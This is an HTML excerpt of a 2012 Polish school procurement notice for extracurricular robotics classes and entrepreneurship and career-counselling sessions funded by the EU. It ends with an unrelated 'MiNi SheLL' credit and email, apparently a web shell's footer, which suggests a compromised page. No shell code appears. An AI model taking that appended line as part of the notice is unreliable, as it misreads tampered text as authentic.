<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmian umowy w zakresie terminu wykonania przedmiotu umowy - w przypadku wystąpienia następujących zdarzeń:
a) siły wyższej nie pozwalającej na realizację umowy: termin wykonania przedmiotu umowy może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu prac z tego powodu - jeżeli przy zachowaniu należytej staranności, nie można było uniknąć zmiany terminu wykonania umowy,
Strona, która zamierza żądać zwolnienia z odpowiedzialności z powodu siły wyższej zobowiązana jest powiadomić drugą Stronę na piśmie, bez zbędnej zwłoki, o jej zajściu i ustaniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspgbuk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zespołu Szkół Ponadgimnazjalnych w Buku, ul. Dworcowa 44, 64-320 Buk, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 10:00, miejsce: Siedziba Zespołu Szkół Ponadgimnazjalnych w Buku, ul. Dworcowa 44, 64-320 Buk, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Jestem zawodowcem, (nr konkursu PO KL 9.2 1 11), realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I:
I.Przeprowadzenie zajęć pozalekcyjnych kształtujących kompetencje kluczowe: matematyczne i podstawowe kompetencje naukowo-techniczne z wykorzystaniem metody dydaktycznej, polegającej na kształtowaniu tych kompetencji poprzez konstruowanie robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE I:
I.Przeprowadzenie zajęć pozalekcyjnych kształtujących kompetencje kluczowe: matematyczne i podstawowe kompetencje naukowo-techniczne z wykorzystaniem metody dydaktycznej, polegającej na kształtowaniu tych kompetencji poprzez konstruowanie robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważne dla 40 uczniów oraz przeprowadzenie szkoleń metodycznych dla 3 nauczycieli. Zadanie to jest integralną częścią projektu, pt. Jestem zawodowcem, (nr konkursu PO KL 9.2I1I11), zwanego dalej projektem realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Uczestnicy projektu - uczniowie - zostaną pogrupowani w 4 grupy zajęciowe (uczniowie klas II i III) Dla grupy przewidziano 1 kurs składający się z 12 zajęć po 135 minut każde ( 3 godz. lekcyjne) - łącznie dla jednej grupy - 36 godzin lekcyjnych. Łącznie dla wszystkich grup 144 godziny lekcyjne. Uczestnicy projektu - nauczyciele -  zostaną pogrupowani w 1 grupę (3 nauczycieli matematyki i fizyki). Dla grupy przewidziano  kurs na dwóch poziomach : I stopnia - 4 dni po 8 godzin oraz II stopnia - 4 dni po 8 godzin, łącznie dla grupy - 64 godziny lekcyjne. Łącznie dla wszystkich grup tj. dla uczniów i nauczycieli 208 godzin lekcyjnych.
Opis wymogów dotyczących programu zajęć : 
Program zajęć musi zostać napisany w języku polskim i przedłożony na piśmie. Program musi przedstawiać scenariusz. modelowego modułu kursu dla jednej grupy uczniów, tj. 12 zajęć po 135 minut każde - łącznie dla jednej grupy - 36 godzin lekcyjnych i dodatkowo wskazywać odrębnie elementy dostosowania go do potrzeb dydaktycznych i możliwości intelektualnych uczniów szkoły ponadgimnazjalnej kl. II i III. Program musi zakładać wykorzystanie podczas każdych z 12 zajęć edukacyjnych zestawów LEGO lub RoboRobo lub równoważnych oraz jasno określać sposób i cel ich każdorazowego wykorzystania podczas zajęć. Program może być dodatkowo przedstawiony w formie prezentacji elektronicznej. Program w wersji pisemnej musi być sporządzony wg następującego wzoru i  z zachowaniem następującego układu prezentacji treści:
PROGRAM
Ogólne założenia dydaktyczne.
CELE dydaktyczne.
Wykorzystane techniki i narzędzia nauczania.
Przewidywane rezultaty.
Scenariusz zajęć nr 1. 
Czas trwania: 135 minut. Uczestnicy: max. 12 osób. Prowadzący: minimum 2 instruktorów.
Narzędzia
Cel zajęć.
Wykorzystane techniki nauczania.
Wykorzystane zasoby techniczne.
Dostosowanie do potrzeb - wynikających z programu nauczania i poziomu edukacji na którym się znajdują i możliwości intelektualnych wynikających z ich wieku - uczestników zajęć.
Przewidywane rezultaty zajęć nr 1.
Dalej scenariusze zajęć 2-12 wg wzoru scenariusza nr 1
Przedstawiony wyżej wzór zawiera stałe, minimalnie wymagane elementy. Zamawiający w celu pełniejszego przedstawienia treści programu może dodać dodatkowe elementy pod warunkiem zachowania ww. minimum układu prezentacji programu.
Wykonawca musi przedłożyć Zamawiającemu PROGRAM ww. zajęć przygotowany w oparciu o zdefiniowane niniejszym, szczegółowe wytyczne dostosowany do wieku uczestników projektu, możliwy do zrealizowania w ramach przedstawionego trybu i okresu przeprowadzenia zajęć oraz z uwzględnieniem zasad zapewnienia zasobów technicznych, niezbędnych do przeprowadzenia zajęć.
Wykonawca musi przedłożyć Zamawiającemu wraz z programem proponowany (wstępny) harmonogram realizacji zadania (tzn. proponowane terminy przeprowadzenia zajęć z 4 grupami zajęciowymi. z uwzględnieniem, iż dla każdej grupy przewidziano 1 kurs składający się z 12 zajęć po 135 minut każde, a zajęcia muszą być zakończone w nieprzekraczalnym terminie do dnia 15 czerwca 2012 r.) Dokument ten będzie podstawą oceny wykonalności zadania przez Wykonawcę, a w konsekwencji wykonalności Projektu przez Zamawiającego i musi być zgodny z podanymi niżej szczegółowymi wytycznymi dot. konstruowania programu. Terminy podane w proponowanym harmonogramie (z wyłączeniem terminu zakończenia zajęć, tj. 15.06.2012r.) zostaną doprecyzowane w ostatecznym harmonogramie zajęć, który zostanie opracowany we współpracy Wykonawcy z Zamawiającym - po podpisaniu umowy.
Szczegółowe wytyczne dot. konstruowania programu: 
Program zajęć jednej grupy musi być rozłożony na 12 zajęć po 135 minut każde, zaplanowanych do przeprowadzenia w roku 2012 w okresie do dnia 15 czerwca 2012 r. i musi być tak skonstruowany, aby udział w zajęciach umożliwił uczestnikom  podniesienie poziomu wiedzy i umiejętności z zakresu kompetencji matematycznej i podstawowej kompetencji naukowo-technicznej (w rozumieniu zapisów dokumentu o nazwie: Zalecenia Parlamentu Europejskiego i Rady w sprawie kompetencji kluczowych w procesie uczenia się przez całe życie z dnia 18.12.2006 r.).
Program zajęć musi być skonstruowany w szczególności w ten sposób, by w swym zamierzeniu dydaktycznym (zdefiniowanym w: ogólnych założeniach dydaktycznych, celach dydaktycznych oraz w celach zdefiniowanych w scenariuszach każdego z 12 zajęć modułu modelowego) prowadził do wzrostu wśród uczestników zajęć wiedzy z zakresu przedmiotowej kompetencji kluczowej, a zwłaszcza: wiedzy z zakresu terminów i pojęć matematycznych,  wiedzy na temat sposobów prezentacji matematycznej, wiedzy na temat wpływu nauki i technologii na świat przyrody, wiedzy na temat zastosowania narzędzi i urządzeń technicznych, wiedzy na temat korzyści i zagrożeń wynikających z praktycznego zastosowania teorii naukowych oraz techniki.
Program zajęć oraz cele dydaktyczne muszą być dostosowane do poziomu wiedzy i umiejętności uczestników wynikającego z ich wieku i etapu edukacji, na którym się znajdują. Program musi być skonstruowany z uwzględnieniem poszanowania zasad polityk horyzontalnych Unii Europejskiej.
Program musi być zgodny z horyzontalną zasadą UE: zrównoważonego rozwoju, opisaną w Art. 17 Rozporządzenia Rady (WE) 1083I2006 dotyczącego Funduszy Strukturalnych i w swojej części dydaktycznej musi zawierać elementy informowania o znaczeniu poszanowania środowiska naturalnego dla dobra przyszłych pokoleń. 
Program musi być zgodny z horyzontalnymi zasadami UE równości i niedyskryminacji zawartymi w Art.16 Rozporządzenia Rady (WE) 1083I2006 dotyczącego Funduszy Strukturalnych.
Program powinien być opracowany w oparciu o wypracowane przez Wykonawcę dotychczasowe dobre praktyki (doświadczenie) prowadzenia zajęć tą metodą .
UCZESTNICY: W zajęciach będą uczestniczyć uczniowie klas II i III Zespołu Szkół Ponadgimnazjalnych Zasadniczej Szkoły Zawodowej w Buku. Rekrutacji uczestników dokona Zamawiający. Liczba uczestników: 40 uczniów ( 4 grupy).
Zamawiający zastrzega sobie prawo do zmniejszenia ilości osób w jednej grupie. Ilość grup nie może ulec zwiększeniu, a ilość osób łącznie nie może przekroczyć liczby 40 uczniów.
ORGANIZACJA ZAJĘĆ:
Zajęcia będą przeprowadzone w budynku szkoły mieszczącym się w Buku przy ul. Dworcowej 44, w salach wskazanych przez Dyrektora Szkoły. Szkoła udostępnią te pomieszczenia bezpłatnie. Zajęcia muszą zostać przeprowadzone w pełnym wymiarze dla każdej z grup.
Przewidywany termin rozpoczęcia zajęć: pierwsza grupa od 20.02.2012 r. Zakończenie zajęć grupy ostatniej do 15.06.2012 r.
Godziny zajęć muszą być zaplanowane w ten sposób, by rozpoczynały się nie wcześniej, niż o godzinie 13.00 i kończyły się nie później, niż o godz. 18.45.  Zajęcia muszą być przeprowadzane w dni robocze: od  poniedziałku do piątku. Nie jest dopuszczalne zaplanowanie zajęć w sobotę lub w niedzielę oraz w okresie wolnym od nauki zgodnie z zatwierdzonym planem organizacji roku szkolnego w województwie wielkopolskim w roku szkolnym 2011I2012. Jednocześnie Zamawiający zastrzega sobie możliwość zmiany w/w godzin, z przyczyn  wynikających z organizacji zajęć szkolnych w danej placówce szkolnej, lub planu zajęć uczestników projektu. Szczegółowy ostateczny harmonogram zajęć zostanie opracowany we współpracy Wykonawcy z Zamawiającym - po podpisaniu umowy. 
Uczestnicy mają pracować w dwuosobowych grupach, co zwiększy skuteczność nauczania.
Zajęcia z jedną grupą będą prowadzone każdorazowo przez przynajmniej 2 instruktorów.
Instruktorzy prowadzący zajęcia muszą być przeszkoleni przez Wykonawcę zajęć  w zakresie konstruowania robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważnych. Muszą posiadać odpowiednie wykształcenie, doświadczenie w pracy instruktora robotyki informatyki oraz odbyli szkolenia z budowy i programowania robotów w certyfikowanej placówce spełniającej wymagania Research Society for Education of Inteligent Robot.
Program zajęć jednej grupy ma być podzielony na 12 zajęć po 135 minut. Program ten  należy zrealizować w okresie podanym powyżej,  w ramach 4 grup -  max. 12 osób w grupie.
Wykonawca zobowiązany będzie do przeprowadzenie testowania okresowego dla każdego uczestnika:  przed rozpoczęciem zajęć - oraz podczas dwukrotnej ewaluacji: po zajęciach nr 6 i po zajęciach nr 12.  Wykonawca w ramach niniejszego zamówienia sporządzi narzędzie badawcze wzrostu umiejętności uczestników w postaci testu kompetencyjnego (tj. pisemnego testu wyboru wraz z kluczem sprawdzającym).
Test kompetencyjny musi umożliwiać zbadanie wzrostu wiedzy uczestników projektu w następujących obszarach przedmiotowej kompetencji kluczowej: wiedzy z zakresu terminów i pojęć matematycznych,  wiedzy na temat sposobów prezentacji matematycznej, wiedzy na temat wpływu nauki i technologii na świat przyrody, wiedzy na temat zastosowania narzędzi i urządzeń technicznych, wiedzy na temat korzyści i zagrożeń wynikających z praktycznego zastosowania teorii naukowych oraz technik.
Wykonawca przeprowadzi testowanie okresowe w ten sposób, iż - w terminie oraz w sposób określony przez Koordynatora Projektu ze strony Zamawiającego - będzie dystrybuował oraz nadzorował wypełnienie arkuszy testowych przez uczestników projektu. Wypełnione arkusze przekaże Zamawiającemu, który dokona ich badania i oceny. 
Wykonawca zobowiąże instruktorów do prowadzenia dzienników zajęć - dostarczonych przez Zamawiającego i prowadzenia pełnej dokumentacji kursu. 
I.2. Ponadto w ramach wykonania zadania I Wykonawca musi dostarczyć (odpłatnie) zestawy do budowy i programowania robotów oraz gadżety motywujące dla uczniów.
Pojedynczy zestaw musi dawać możliwość zbudowania i zaprogramowania w pełni działających robotów. Jeden zestaw daje możliwość zbudowania co najmniej 20, znacząco różnych konstrukcji robotów, według załączonych z zestawem instrukcji.
I.2.1.Zestaw do budowy robota.
Ilość: 5 sztuk
Zestaw klocków do składania robotów (jeden zestaw) musi składać się z:
1.Zestawu LEGO Mindsotorms lub równoważnego
2.Miarki rozwijanej
3.Zestawu uzupełniającego
4.Dodatkowych czujników
5.Planszy do zadań
I.2.2. 
1.Lutownica, ilość: 3 sztuki
2.Przybory do lutowania, ilość: 3 sztuki
3.Maty, ilość: 3 sztuki
4.Sensor dalmierz ultradźwiękowy (2 rodzaje), ilość: 20 sztuk.
I.2.3.Gadżety motywujące - ilość 40 sztuk - to roboty edukacyjne HexBug Nano lub równoważne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie zajęć pozalekcyjnych z zakresu kształtowania wśród uczniów kompetencji inicjatywności i przedsiębiorczości z elementami doradztwa zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE II:
Przeprowadzenie zajęć pozalekcyjnych z zakresu kształtowania wśród uczniów kompetencji inicjatywności i przedsiębiorczości z elementami doradztwa zawodowego. Zadanie to jest integralną częścią projektu, pt. Jestem zawodowcem, (nr konkursu PO KL 9.2I1I11), zwanego dalej projektem realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Ilość uczestników : 40 
Celem zajęć jest wzrost wiedzy i umiejętności uczniów m.in. planowania, organizowania, analizowania, komunikowania, sporządzania raportów, negocjacji, pracy indywidualnej, współpracy w zespołach, identyfikacji własnych mocnych i słabych stron. Spotkania z trenerem odbywać się będą w systemie spotkań indywidualnych i zbiorowym, w czasie pozalekcyjnym. 
Spotkania indywidualne każdy uczeń - 10 spotkań  po 1,5 godziny zegarowej, czyli łącznie 15 godzin na 1 ucznia. W trakcie ich trwania tworzone będą Indywidualne Plany Działania, w wyniku których nastąpi identyfikacja oczekiwań, określenie celów zawodowych, poznanie mocnych i słabych stron, wyznaczanie celów i podjęcie dalszych decyzji edukacyjnych i zawodowych przez każdego ucznia.
Łącznie 600 godzin spotkań indywidualnych.
Wykonawca musi opracować i przedłożyć Zamawiającemu PROGRAM (w tym szczegółowe scenariusze zajęć) zajęć  indywidualnych z zakresu kluczowych kompetencji inicjatywności i przedsiębiorczości oraz Indywidualne Plany Działania opracowane dla każdego ucznia.
Spotkania grupowe: zajęcia odbywać się będą w dwóch grupach, prowadzonych przez dwóch trenerów- specjalistów. Każda grupa - 10 spotkań po 2 godziny (razem 40 godzin spotkań grupowych).
Wykonawca musi opracować i przedłożyć Zamawiającemu PROGRAM zajęć grupowych (w tym szczegółowe scenariusze zajęć) z zakresu kluczowych kompetencji inicjatywności i przedsiębiorczości.
Łącznie 640 godzin spotkań indywidualnych i grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com